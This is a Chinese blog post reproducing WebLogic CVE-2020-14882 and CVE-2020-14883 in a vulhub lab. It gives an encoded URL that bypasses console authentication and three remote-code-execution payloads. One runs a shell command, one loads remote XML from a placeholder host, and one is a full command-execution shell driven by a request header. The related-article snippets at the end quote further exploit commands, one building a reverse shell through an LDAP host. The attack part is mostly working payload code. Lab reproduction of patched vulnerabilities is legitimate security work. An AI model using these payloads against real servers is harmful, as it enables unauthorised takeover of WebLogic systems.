weblogic RCE(CVE-2020-14882 CVE-2020-14883) 复现

最新推荐文章于 2023-12-11 19:45:00 发布
最新推荐文章于 2023-12-11 19:45:00 发布
阅读量696 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sopromeo/article/details/114647254
版权

影响版本

Weblogic : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

vulhub 一键起即可

CVE-2020-14882

未授权访问

http://10.219.64.141:7001/console/css/%252e%252e%252fconsole.portal

在这里插入图片描述
这个payload其实是经过了2次url编码

访问如下url即可越权访问后台

CVE-2020-14883

payload一:

console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

在这里插入图片描述
这个payload不能用来弹shell,可以尝试写马
这个利用方法只能在Weblogic 12.2.1以上版本利用

payload 二:

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")

上述payload我没有复现成功,应该是我配置的问题

payload 三:

/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')

再添加请求头cmd 即可
在这里插入图片描述
这个payload是我在一个exp里找到的
CVE-exp

penson by 小乌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CVE-2020-2883:Weblogic coherence.jar RCE
04-13
CVE-2020-2883 先克隆框架 git clone https://github.com/Y4er/CVE-2020-2555 然后将 CVE_2020_2883.java 放到 src/com/supeream/CVE_2020_2883.java 目录下 导入idea运行 CVE_2020_2883.java RCE! 截图
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 893
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
CVE-2023-21839 Weblogic未授权RCE
bring_coco的博客
08-29 1125
https://github.com/4ra1n/CVE-2023-21839下载之后。然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口。然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击。生成CVE-2023-21389.exe。这样就成功弹回了shell。
Weblogic RCE合集
Aiwin的博客
05-09 1205
Weblogic RCE合集
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1497
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
CVE-2020-14882 weblogic 未授权命令执行复现及分析
weixin_39811856的博客
10-30 932
简介 该漏洞通过HTTP协议进行利用,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。 环境搭建 windows server 2012 weblogic 12 通过宽字节安全的分析来看(调试源码): http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi") ...
红队攻防实战之Weblogic-RCE集锦
最新发布
众生度尽,方证菩提
12-11 993
须知少时凌云志,曾许人间第一流
vulhub漏洞—weblogic RCE
weixin_45808483的博客
12-02 1042
一开始只知道一个IP 212.129.248.63 使用nmap扫描开放的端口 经过尝试我们发现 7001 端口是我们的要打的靶机漏洞 使用 Xary 扫描 xray_windows_amd64.exe webscan --url http://212.129.248.63:7001/ --html-output 1203.html 漏洞利用 ...
CVE-2020-14882​&14883Weblogic RCE复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
CVE-2020-2551:具有IIOP的Weblogic RCE
03-08
具有IIOP的CVE-2020-2551 Weblogic RCE 0x01默认启用IIOP 0x02 Poc演示
weblogicrce poc
12-21
weblogicrce 测试脚本,使用该工具可以对weblogicrce服务进行检测和利用
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
CVE_2020_2546:CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3有效负载利用poc python3,
03-20
推特: 1,Weblogic RCE漏洞利用CVE_2020_2546 CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic RCE T3有效载荷利用POC python3 2,利用GIOP +发送绑定(CVE-2020-...
CVE-2020-14756:WebLogic T3IIOP RCE coherence.jar的ExternalizableHelper.class
05-25
CVE-2020-14756 的WebLogic T3 / IIOP RCE ExternalizableHelper.class of coherence.jar 自述文件 基于和项目 在12.2.1.4.0和jdk 1.8.0_221上测试 参考
CVE-2017-10271:CVE-2017-10271 WEBLOGIC RCE(已测试)
04-27
CVE-2017-10271 用法:CVE-2017-12149.py targetip WEBLOGIC RCE仅适用于Windows,您可以为Linux编辑一点代码。
CVE-2020-2555:Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE
03-20
CVE-2020-2555 Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE com.supeream.CVE_2020_2555 /* * author:Y4er.com * * gadget: * BadAttributeValueExpException.readObject() * ...
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve...
CVE-2018-2894:CVE-2018-2894 WebLogic不受限制的文件上传导致RCE检查脚本
04-30
CVE-2018-2894CVE-2018-2894 (WebLogic 未授权访问致任意文件上传/RCE漏洞) 检查脚本.
最新2018年7月WebLogic漏洞(CVE-2018-2893) 适用于weblogic12.2.1.3
07-23
Oracle的高危远程代码执行漏洞(CVE-2018-2893),通过该漏洞攻击者可以在未授权的情况下远程执行任意代码。 受此漏洞影响的版本包括: WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.2 WebLogic 12.2.1.3 ...
weblogic-cve-2020-25516
07-25
C知道: 对于您提到的Weblogic漏洞CVE-2020-25516,这是一个已经被公开披露的漏洞,它影响了Oracle WebLogic Server的某些版本。 具体来说,这个漏洞是由于WebLogic Server管理控制台的不当权限验证机制所导致的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值